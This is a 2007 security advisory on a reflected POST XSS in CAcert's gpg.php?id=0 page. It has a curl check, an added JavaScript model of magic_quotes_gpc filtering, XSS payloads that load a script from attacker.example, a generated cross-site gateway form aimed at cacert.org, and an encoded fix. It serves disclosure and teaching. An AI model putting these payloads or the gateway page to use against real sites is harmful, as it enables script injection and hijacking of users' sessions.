https://www.cacert.org/gpg.php?id=0 POST[CSR] XSS

This is part of a code audit on cacert sources. Francesco 'ascii' Ongaro - www.ush.it

HTML POC

>>> POST XSS and external source load POC <<<
I'm a gateway page, as used in POST XSS attacks. Click send to trigger the event.

Fast check

The Cookie header is required because the handler is only reachable when logged in (see Summary); curl -i prints the response headers, and the reflected CSR value comes back in the body that follows them.

curl -ki "https://www.cacert.org/gpg.php?id=0" -d "CSR=TETE" -H "Cookie: cacert=7fac611e47816f58d1f4b9add77074fc"

HTTP/1.1 200 OK
Date: Sun, 07 Jan 2007 06:00:28 GMT
Server: Apache/1.3.33 (Debian GNU/Linux) mod_gzip/1.3.26.1a PHP/4.4.2-1.1 mod_ssl/2.8.25 OpenSSL/0.9.8a
X-Powered-By: PHP/4.4.2-1.1
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1

Vulnerable code

pages/gpg/0.php:

Summary

- POST XSS
- magic_quotes_gpc ON
- Affected by user role (only logged in)
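Added example, not part of the advisory and not CAcert code: it models the CSR reflection described above with magic_quotes_gpc ON, shows why the HTML POC's "external source load" has to be a quote-free payload, and rebuilds the gateway page as a cross-site POST form. The target URL is the one from the advisory; the script host attacker.example and the textarea sink are assumptions, since the page does not reproduce pages/gpg/0.php.

```javascript
// Added example (not from the advisory): models a reflected POST XSS behind
// magic_quotes_gpc, the hardened form of the sink, and the gateway page.

// Emulates PHP's magic_quotes_gpc, which runs addslashes() over every
// GET/POST/COOKIE value: ' " \ and NUL get a backslash in front of them.
function magicQuotesGpc(value) {
  return value.replace(/([\\'"])/g, '\\$1').replace(/\0/g, '\\0');
}

// Assumed model of the vulnerable sink: the CSR value is written back
// into the page without HTML encoding.
function reflectVulnerable(csr) {
  return '<textarea name="CSR">' + csr + '</textarea>';
}

// HTML-encode like PHP's htmlspecialchars($csr, ENT_QUOTES).
function htmlEncode(value) {
  return value
    .replace(/&/g, '&amp;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#039;');
}

// Hardened sink: encode before reflecting; magic quotes are not a defence.
function reflectHardened(csr) {
  return '<textarea name="CSR">' + htmlEncode(csr) + '</textarea>';
}

// Quoted payload: addslashes() puts backslashes inside the src attribute,
// so the script URL is mangled and the load fails.
const QUOTED_PAYLOAD =
  '</textarea><script src="//attacker.example/x.js"></script>';

// Quote-free payload: closes the textarea and loads an external script via
// an unquoted src attribute, so addslashes() has nothing to escape.
const QUOTE_FREE_PAYLOAD =
  '</textarea><script src=//attacker.example/x.js></script>';

// True when the payload reaches the page byte-for-byte after passing
// through magic_quotes_gpc and the given sink.
function survives(payload, sink) {
  return sink(magicQuotesGpc(payload)).includes(payload);
}

// Rebuilds the "gateway page": an attacker-hosted HTML page whose form POSTs
// the payload to gpg.php?id=0. The victim's browser attaches its own cacert
// session cookie, which is why the bug only matters for logged-in users.
function gatewayPage(payload) {
  return [
    '<html><body>',
    '<form method="POST" action="https://www.cacert.org/gpg.php?id=0">',
    '<input type="hidden" name="CSR" value="' + htmlEncode(payload) + '">',
    '<input type="submit" value="send">',
    '</form>',
    "I'm a gateway page, as used in POST XSS attacks. Click send to trigger the event.",
    '</body></html>',
  ].join('\n');
}

console.log('quoted payload survives magic quotes:', survives(QUOTED_PAYLOAD, reflectVulnerable));
console.log('quote-free payload survives magic quotes:', survives(QUOTE_FREE_PAYLOAD, reflectVulnerable));
console.log('quote-free payload survives hardened sink:', survives(QUOTE_FREE_PAYLOAD, reflectHardened));
console.log(gatewayPage(QUOTE_FREE_PAYLOAD));
```

The quoted payload is neutralised by magic quotes only by accident; the quote-free variant goes straight through, which is the usual reason "magic_quotes_gpc ON" appears in the summary of an XSS report rather than as a mitigation. Only the encoded sink stops both.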